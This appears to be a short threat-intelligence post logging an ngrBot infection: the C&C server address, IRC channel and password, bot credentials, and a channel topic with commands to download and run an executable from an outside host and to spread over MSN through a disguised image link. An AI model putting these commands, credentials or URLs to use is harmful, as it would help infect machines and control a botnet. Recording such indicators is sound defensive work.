77.79.7.246(ngrBot hosted in Lithuania Splius Uab)

DNS Lookup
Host Name IP Address
api.wipmania.com
api.wipmania.com 213.251.170.52
fullyundetectable.com
UDP Connections
Download URLs
http://213.251.170.52/ (api.wipmania.com)

Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 77.79.7.246:1863
Server Password:
Username: iogjzhd
Nickname: n{DE|XPa}iogjzhd
Channel: #ngr (Password: ngrbot)
Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg

Now talking in #ngr
Topic On: [ #ngr ] [ .s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg ]
Topic By: [ DCO ]
Joins: {USA|W7u}gpqhwpn [gpqhwpn@5BD873C8.B62ADEB3.A9D605B8.IP](13{USA|W7u}gpqhwpn) [MSN]: Updated MSN spread interval to “5”
{USA|W7u}gpqhwpn) [MSN]: Updated MSN spread message to “http://img33.lmageshack.org/images/?id=image11.jpg”

hosting infos:
http://whois.domaintools.com/77.79.7.246

Categories: Uncategorized